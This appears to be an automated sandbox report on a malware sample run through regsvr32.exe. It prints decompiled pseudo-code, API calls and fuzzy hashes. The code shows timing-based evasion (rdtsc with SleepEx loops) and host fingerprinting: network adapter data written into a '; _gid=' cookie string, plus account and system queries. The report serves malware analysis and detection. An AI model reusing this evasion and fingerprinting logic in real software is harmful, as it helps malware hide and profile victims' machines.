                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • LookupAccountNameW.ADVAPI32 ref: 0214233C
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2095983808.0000000002140000.00000040.00000001.sdmp, Offset: 02140000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AccountLookupName
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1484870144-0
                                                                                                                                                                                                            • Opcode ID: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
                                                                                                                                                                                                            • Instruction ID: 16c46f7e8213228a07a3b202cd6149e2272e648524bcc48aca5dd4aa1bed680b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 59316D72701F418AEB249FB5E8483EA33A4EB48B88F994135EE4D57B18EF38C159C340
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 02142434, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                                                                            			E02142434(void* __eax, signed long long __rax, signed long long __rbx, signed int __rcx, signed long long __rdx, long long __rdi, void* __rsi, void* __r9, void* __r11, void* __r14) {
				void* __rbp;
				void* _t27;
				void* _t40;
				void* _t41;
				signed long long _t51;
				signed long long _t52;
				signed long long _t64;
				long long _t69;
				void* _t73;
				void* _t75;
				void* _t82;

				_t82 = __r9;
				_t71 = __rsi;
				_t69 = __rdi;
				_t64 = __rdx;
				_t52 = __rbx;
				_t51 = __rax;
				 *((long long*)(_t75 + 0x18)) = __rbx;
				 *((long long*)(_t75 + 0x20)) = __rdi;
				_t73 = _t75 - 0x57;
				_t4 = _t52 + 4; // 0x4
				_t40 = _t4;
				goto L1;
				L9:
				return 0;
				L1:
				asm("rdtsc");
				_t64 = _t64 << 0x20;
				_t51 = _t51 | _t64;
				_t52 = _t52 << 0x00000010 | __rcx;
				SleepEx(??, ??); // executed
				_t69 = _t69 - 1;
				if(_t69 != 0) {
					goto L1;
				} else {
					wsprintfA();
					E021411FC(_t73 - 0x29, _t52);
					_t37 = E0214153C(_t73 - 0x29);
					E02142C08( *((intOrPtr*)(_t73 + 0x17)), _t23, _t40, _t51, _t52, __rsi, _t73, _t73 - 0x49, _t82);
					_t44 = _t51;
					if(_t51 != 0) {
						_t80 = _t73 + 0x67;
						if(E02141EEC(_t37, _t44, _t51, _t52, _t73 + 0x1b, _t51, _t71, _t73, _t73 + 0x67, _t73 + 0x6f, __r11, __r14) != 0) {
							_t67 =  *((intOrPtr*)(_t73 + 0x6f));
							if( *((intOrPtr*)(_t73 + 0x6f)) >= 0x400) {
								_t27 = E0214272C(0, _t37, _t40,  *((intOrPtr*)(_t73 + 0x67)), _t67, _t69, _t73, _t80, __r11, __r14);
								_t55 =  *((intOrPtr*)(_t73 + 0x67));
								_t41 = _t27;
								if( *((intOrPtr*)(_t73 + 0x67)) != 0) {
									GetProcessHeap();
									HeapFree(??, ??, ??);
								}
								E02141FD0(_t41, _t51, _t55, _t73 - 0x49, _t71);
								_t49 = _t51;
								if(_t51 != 0) {
									E02142A1C(_t49, _t73 + 0x1b, _t51);
								}
							}
						}
					}
					goto L9;
				}
			}














                                                                                                                                                                                                            0x02142434
                                                                                                                                                                                                            0x02142434
                                                                                                                                                                                                            0x02142434
                                                                                                                                                                                                            0x02142434
                                                                                                                                                                                                            0x02142434
                                                                                                                                                                                                            0x02142434
                                                                                                                                                                                                            0x02142434
                                                                                                                                                                                                            0x02142439
                                                                                                                                                                                                            0x0214243f
                                                                                                                                                                                                            0x0214244d
                                                                                                                                                                                                            0x0214244d
                                                                                                                                                                                                            0x0214244d
                                                                                                                                                                                                            0x02142512
                                                                                                                                                                                                            0x02142528
                                                                                                                                                                                                            0x02142450
                                                                                                                                                                                                            0x02142454
                                                                                                                                                                                                            0x02142456
                                                                                                                                                                                                            0x0214245a
                                                                                                                                                                                                            0x02142460
                                                                                                                                                                                                            0x02142468
                                                                                                                                                                                                            0x0214246e
                                                                                                                                                                                                            0x02142472
                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                            0x02142474
                                                                                                                                                                                                            0x02142482
                                                                                                                                                                                                            0x0214248c
                                                                                                                                                                                                            0x0214249d
                                                                                                                                                                                                            0x0214249f
                                                                                                                                                                                                            0x021424a4
                                                                                                                                                                                                            0x021424a7
                                                                                                                                                                                                            0x021424b0
                                                                                                                                                                                                            0x021424bf
                                                                                                                                                                                                            0x021424c1
                                                                                                                                                                                                            0x021424cc
                                                                                                                                                                                                            0x021424d2
                                                                                                                                                                                                            0x021424d7
                                                                                                                                                                                                            0x021424db
                                                                                                                                                                                                            0x021424e0
                                                                                                                                                                                                            0x021424e2
                                                                                                                                                                                                            0x021424f0
                                                                                                                                                                                                            0x021424f0
                                                                                                                                                                                                            0x021424fc
                                                                                                                                                                                                            0x02142501
                                                                                                                                                                                                            0x02142504
                                                                                                                                                                                                            0x0214250d
                                                                                                                                                                                                            0x0214250d
                                                                                                                                                                                                            0x02142504
                                                                                                                                                                                                            0x021424cc
                                                                                                                                                                                                            0x021424bf
                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                            0x021424a7

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2095983808.0000000002140000.00000040.00000001.sdmp, Offset: 02140000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Sleep
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3472027048-0
                                                                                                                                                                                                            • Opcode ID: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                            • Instruction ID: 53312ddcbaf62ce1200b87d1cad9395bec7bdf7f4eb2bf7d637698892fe3c9f0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EA21B376740A409AEF10EFB1E4643ED2362FB58788F984426EE4D57648EF38D589C750
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0214260C, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,0000011C,02141E13), ref: 0214264B
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2095983808.0000000002140000.00000040.00000001.sdmp, Offset: 02140000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: InfoNativeSystem
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1721193555-0
                                                                                                                                                                                                            • Opcode ID: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
                                                                                                                                                                                                            • Instruction ID: fb63f460e3ac25d6e8c86ebb464c99d4a08b28762833866beee1468870672338
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4EE09232721541D2DF20FB20F8583D97321FBA4704F840222895E436A0EF3CE69EC740
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 02141000, Relevance: 1.5, APIs: 1, Instructions: 13threadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2095983808.0000000002140000.00000040.00000001.sdmp, Offset: 02140000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateThread
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2422867632-0
                                                                                                                                                                                                            • Opcode ID: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
                                                                                                                                                                                                            • Instruction ID: 2da255155dd89deca7ba4152cca6c44458c8f7026d846afa980bcf2970f15979
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B8D0A972E1068083F730AB20EA1A3DA2321F3A4319F808206CA4E4A964CF3CC1A8CA00
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                            Analysis Process: regsvr32.exe PID: 1916 Parent PID: 2624 regsvr32.exeCOMMON

                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                            Function 005A27BC, Relevance: 3.1, APIs: 2, Instructions: 87COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            C-Code - Quality: 25%
                                                                                                                                                                                                            			E005A27BC(long long __rbx, void* __rcx, signed long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* __rdi;
				int _t23;
				void* _t24;
				void* _t27;
				intOrPtr _t35;
				void* _t36;
				intOrPtr* _t44;
				long long _t46;
				intOrPtr* _t48;
				intOrPtr* _t54;
				intOrPtr* _t62;
				signed long long _t64;
				long long* _t67;
				intOrPtr* _t69;
				void* _t77;
				void* _t78;
				struct HINSTANCE__* _t79;
				void* _t80;
				CHAR* _t82;
				char* _t83;

				_t64 = __rsi;
				_t46 = __rbx;
				_t44 = _t69;
				 *((long long*)(_t44 + 8)) = __rbx;
				 *((long long*)(_t44 + 0x18)) = __rbp;
				 *((long long*)(_t44 + 0x20)) = __rsi;
				_push(_t62);
				_t80 = __rcx;
				_t83 = L"; _gid=";
				 *(_t44 + 0x10) =  *(_t44 + 0x10) & 0;
				LoadLibraryA(_t82);
				GetProcAddress(_t79);
				_t67 = _t44;
				if(_t44 == 0) {
					L6:
					r9d = 1;
					_t23 = E005A2990(_t36, _t44, _t46, _t80, L"; _gid=", _t62, 0x5a70c4, _t77, _t78);
					L7:
					return _t23;
				}
				_t24 =  *_t67(); // executed
				if(_t24 == 0x6f && __rbx != 0) {
					GetProcessHeap();
					_t9 = _t64 + 8; // 0x8
					_t36 = _t9;
					HeapAlloc(??, ??, ??);
					_t62 = _t44;
					if(_t44 == 0) {
						goto L6;
					}
					_t54 = _t44; // executed
					_t27 =  *_t67(); // executed
					if(_t27 == 0) {
						_t48 = _t62;
						do {
							if( *((char*)(_t48 + 0x1c0)) != 0x30 ||  *((char*)(_t48 + 0x1c1)) != 0x2e) {
								_t35 =  *((intOrPtr*)(_t48 + 0x194));
								if(_t54 - 1 <= 7) {
									r9d = _t35;
									_t18 = _t48 + 0x198; // 0x198
									_t54 = _t80 + _t64 * 2;
									E005A2990(_t36, _t44, _t48, _t54, _t83, _t62, _t18, _t77, _t78);
									_t64 = _t64 + _t44;
									_t83 = ":";
								}
							}
							_t48 =  *_t48;
						} while (_t48 != 0);
						GetProcessHeap();
						_t36 = 0;
						_t23 = HeapFree(??, ??, ??);
						if(_t64 == 0) {
							goto L6;
						}
						goto L7;
					}
					GetProcessHeap();
					_t36 = 0;
					HeapFree(??, ??, ??);
				}
			}























                                                                                                                                                                                                            0x005a27bc
                                                                                                                                                                                                            0x005a27bc
                                                                                                                                                                                                            0x005a27bc
                                                                                                                                                                                                            0x005a27bf
                                                                                                                                                                                                            0x005a27c3
                                                                                                                                                                                                            0x005a27c7
                                                                                                                                                                                                            0x005a27cb
                                                                                                                                                                                                            0x005a27d4
                                                                                                                                                                                                            0x005a27d7
                                                                                                                                                                                                            0x005a27e7
                                                                                                                                                                                                            0x005a27ea
                                                                                                                                                                                                            0x005a27fa
                                                                                                                                                                                                            0x005a2800
                                                                                                                                                                                                            0x005a2806
                                                                                                                                                                                                            0x005a285f
                                                                                                                                                                                                            0x005a285f
                                                                                                                                                                                                            0x005a2876
                                                                                                                                                                                                            0x005a287b
                                                                                                                                                                                                            0x005a2893
                                                                                                                                                                                                            0x005a2893
                                                                                                                                                                                                            0x005a280f
                                                                                                                                                                                                            0x005a2814
                                                                                                                                                                                                            0x005a281f
                                                                                                                                                                                                            0x005a282c
                                                                                                                                                                                                            0x005a282c
                                                                                                                                                                                                            0x005a282f
                                                                                                                                                                                                            0x005a2835
                                                                                                                                                                                                            0x005a283b
                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                            0x005a2842
                                                                                                                                                                                                            0x005a2845
                                                                                                                                                                                                            0x005a2849
                                                                                                                                                                                                            0x005a2894
                                                                                                                                                                                                            0x005a2897
                                                                                                                                                                                                            0x005a289e
                                                                                                                                                                                                            0x005a28a9
                                                                                                                                                                                                            0x005a28b5
                                                                                                                                                                                                            0x005a28b7
                                                                                                                                                                                                            0x005a28ba
                                                                                                                                                                                                            0x005a28c1
                                                                                                                                                                                                            0x005a28c8
                                                                                                                                                                                                            0x005a28cd
                                                                                                                                                                                                            0x005a28d0
                                                                                                                                                                                                            0x005a28d0
                                                                                                                                                                                                            0x005a28b5
                                                                                                                                                                                                            0x005a28d7
                                                                                                                                                                                                            0x005a28da
                                                                                                                                                                                                            0x005a28df
                                                                                                                                                                                                            0x005a28e8
                                                                                                                                                                                                            0x005a28ed
                                                                                                                                                                                                            0x005a28f6
                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                            0x005a28fc
                                                                                                                                                                                                            0x005a284b
                                                                                                                                                                                                            0x005a2854
                                                                                                                                                                                                            0x005a2859
                                                                                                                                                                                                            0x005a2859

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetAdaptersInfo.IPHLPAPI(?,?,00000000,005A2CFE,?,?,00000003,005A24A4), ref: 005A280F
                                                                                                                                                                                                            • GetAdaptersInfo.IPHLPAPI(?,?,00000000,005A2CFE,?,?,00000003,005A24A4), ref: 005A2845
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000005.00000002.2102550080.00000000005A0000.00000040.00000001.sdmp, Offset: 005A0000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AdaptersInfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3177971545-0
                                                                                                                                                                                                            • Opcode ID: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
                                                                                                                                                                                                            • Instruction ID: e536a8f0a922bf4ec564d583fb5390e609b0d1cd5df2e43bc60415a451f1fe03
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D31BE21701B8191EB15CB6AEC0979E7BA0FB8AF91F084125DE0D0B714EF7CC589CB01
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 005A1810, Relevance: 1.7, APIs: 1, Instructions: 198memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000005.00000002.2102550080.00000000005A0000.00000040.00000001.sdmp, Offset: 005A0000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                            • Opcode ID: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                            • Instruction ID: 855c69dd71c9783eb9534f3e5ff8bb4af0890be1d05e6e6afbfef95ce422666a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4771BE32301F8187EB248FA6EC007AE3BA5FB8AB95F0486259E4A43B14DF78C555CB44
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 005A1678, Relevance: 1.6, APIs: 1, Instructions: 77nativeCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • NtQuerySystemInformation.NTDLL(?,?,00000000,005A2CB1,?,?,00000003,005A24A4), ref: 005A16CB
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000005.00000002.2102550080.00000000005A0000.00000040.00000001.sdmp, Offset: 005A0000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: InformationQuerySystem
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3562636166-0
                                                                                                                                                                                                            • Opcode ID: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                            • Instruction ID: db08c4e0666b64a89799b8e32135fadb53d30e3aaa6a04ef5ec4cabfc072e331
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 02218125315F4083EB05CBA6AC0836EA6A1FB8BBD2F185134DE4A4B714EF7CC8458F05
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 005A10AC, Relevance: 3.0, APIs: 2, Instructions: 10COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000005.00000002.2102550080.00000000005A0000.00000040.00000001.sdmp, Offset: 005A0000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExitProcessSleepUser
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 354099737-0
                                                                                                                                                                                                            • Opcode ID: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
                                                                                                                                                                                                            • Instruction ID: 6e517784d9ae554034c0b15d887f8faed6af0f3331d72dbba59b13d1ec36acaa
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F2C01220208E80C3E21D57A0AE4C32A3628B382306F000B19C202096A08F7804C89F07
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 005A22DC, Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • LookupAccountNameW.ADVAPI32 ref: 005A233C
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000005.00000002.2102550080.00000000005A0000.00000040.00000001.sdmp, Offset: 005A0000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AccountLookupName
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1484870144-0
                                                                                                                                                                                                            • Opcode ID: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
                                                                                                                                                                                                            • Instruction ID: a7dd7d98ef99cbba403d93b3fa40dbe5627d4af281493dbf64948d3fda026f00
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 53316D72705E418AEF108FB9E84439E77E4FB8A789F584136DA4D4BA18EF38C548DB41
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 005A2434, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                                                                            			E005A2434(void* __eax, signed long long __rax, signed long long __rbx, signed int __rcx, signed long long __rdx, long long __rdi, void* __rsi, void* __r9, void* __r11, void* __r14) {
				void* __rbp;
				void* _t27;
				void* _t40;
				void* _t41;
				signed long long _t51;
				signed long long _t52;
				signed long long _t64;
				long long _t69;
				void* _t73;
				void* _t75;
				void* _t82;

				_t82 = __r9;
				_t71 = __rsi;
				_t69 = __rdi;
				_t64 = __rdx;
				_t52 = __rbx;
				_t51 = __rax;
				 *((long long*)(_t75 + 0x18)) = __rbx;
				 *((long long*)(_t75 + 0x20)) = __rdi;
				_t73 = _t75 - 0x57;
				_t4 = _t52 + 4; // 0x4
				_t40 = _t4;
				goto L1;
				L9:
				return 0;
				L1:
				asm("rdtsc");
				_t64 = _t64 << 0x20;
				_t51 = _t51 | _t64;
				_t52 = _t52 << 0x00000010 | __rcx;
				SleepEx(??, ??); // executed
				_t69 = _t69 - 1;
				if(_t69 != 0) {
					goto L1;
				} else {
					wsprintfA();
					E005A11FC(_t73 - 0x29, _t52);
					_t37 = E005A153C(_t73 - 0x29);
					E005A2C08( *((intOrPtr*)(_t73 + 0x17)), _t23, _t40, _t51, _t52, __rsi, _t73, _t73 - 0x49, _t82);
					_t44 = _t51;
					if(_t51 != 0) {
						_t80 = _t73 + 0x67;
						if(E005A1EEC(_t37, _t44, _t51, _t52, _t73 + 0x1b, _t51, _t71, _t73, _t73 + 0x67, _t73 + 0x6f, __r11, __r14) != 0) {
							_t67 =  *((intOrPtr*)(_t73 + 0x6f));
							if( *((intOrPtr*)(_t73 + 0x6f)) >= 0x400) {
								_t27 = E005A272C(0, _t37, _t40,  *((intOrPtr*)(_t73 + 0x67)), _t67, _t69, _t73, _t80, __r11, __r14);
								_t55 =  *((intOrPtr*)(_t73 + 0x67));
								_t41 = _t27;
								if( *((intOrPtr*)(_t73 + 0x67)) != 0) {
									GetProcessHeap();
									HeapFree(??, ??, ??);
								}
								E005A1FD0(_t41, _t51, _t55, _t73 - 0x49, _t71);
								_t49 = _t51;
								if(_t51 != 0) {
									E005A2A1C(_t49, _t73 + 0x1b, _t51);
								}
							}
						}
					}
					goto L9;
				}
			}














                                                                                                                                                                                                            0x005a2434
                                                                                                                                                                                                            0x005a2434
                                                                                                                                                                                                            0x005a2434
                                                                                                                                                                                                            0x005a2434
                                                                                                                                                                                                            0x005a2434
                                                                                                                                                                                                            0x005a2434
                                                                                                                                                                                                            0x005a2434
                                                                                                                                                                                                            0x005a2439
                                                                                                                                                                                                            0x005a243f
                                                                                                                                                                                                            0x005a244d
                                                                                                                                                                                                            0x005a244d
                                                                                                                                                                                                            0x005a244d
                                                                                                                                                                                                            0x005a2512
                                                                                                                                                                                                            0x005a2528
                                                                                                                                                                                                            0x005a2450
                                                                                                                                                                                                            0x005a2454
                                                                                                                                                                                                            0x005a2456
                                                                                                                                                                                                            0x005a245a
                                                                                                                                                                                                            0x005a2460
                                                                                                                                                                                                            0x005a2468
                                                                                                                                                                                                            0x005a246e
                                                                                                                                                                                                            0x005a2472
                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                            0x005a2474
                                                                                                                                                                                                            0x005a2482
                                                                                                                                                                                                            0x005a248c
                                                                                                                                                                                                            0x005a249d
                                                                                                                                                                                                            0x005a249f
                                                                                                                                                                                                            0x005a24a4
                                                                                                                                                                                                            0x005a24a7
                                                                                                                                                                                                            0x005a24b0
                                                                                                                                                                                                            0x005a24bf
                                                                                                                                                                                                            0x005a24c1
                                                                                                                                                                                                            0x005a24cc
                                                                                                                                                                                                            0x005a24d2
                                                                                                                                                                                                            0x005a24d7
                                                                                                                                                                                                            0x005a24db
                                                                                                                                                                                                            0x005a24e0
                                                                                                                                                                                                            0x005a24e2
                                                                                                                                                                                                            0x005a24f0
                                                                                                                                                                                                            0x005a24f0
                                                                                                                                                                                                            0x005a24fc
                                                                                                                                                                                                            0x005a2501
                                                                                                                                                                                                            0x005a2504
                                                                                                                                                                                                            0x005a250d
                                                                                                                                                                                                            0x005a250d
                                                                                                                                                                                                            0x005a2504
                                                                                                                                                                                                            0x005a24cc
                                                                                                                                                                                                            0x005a24bf
                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                            0x005a24a7

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000005.00000002.2102550080.00000000005A0000.00000040.00000001.sdmp, Offset: 005A0000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Sleep
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3472027048-0
                                                                                                                                                                                                            • Opcode ID: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                            • Instruction ID: b333271529a5c664d50a82cfc16e9fd50330112a45d94e660bf19e3223dae9f7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1121D032700E419AEF10EFB5E8593DE27A1F78A784F484526EE0D5B608EF38DA09C750
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 005A260C, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,0000011C,005A1E13), ref: 005A264B
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000005.00000002.2102550080.00000000005A0000.00000040.00000001.sdmp, Offset: 005A0000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: InfoNativeSystem
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1721193555-0
                                                                                                                                                                                                            • Opcode ID: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
                                                                                                                                                                                                            • Instruction ID: 43bb66618e2283172de123595d5f387af305916e7613d316dd1c6abc31302452
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 60E09222724945C2DF10EB60EC4C39E3320FBC9705F840222965E02660EF6CC75DCF01
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 005A1000, Relevance: 1.5, APIs: 1, Instructions: 13threadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000005.00000002.2102550080.00000000005A0000.00000040.00000001.sdmp, Offset: 005A0000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateThread
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2422867632-0
                                                                                                                                                                                                            • Opcode ID: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
                                                                                                                                                                                                            • Instruction ID: d291f73adea53119c74c0dd75a87fbf4afeadea444bfcd1883afb2d3fc77ffab
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 05D0A772F10A4083E7308710EE1A39B3711F3D5316F804306C64948554DF7CC158CE05
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Non-executed Functions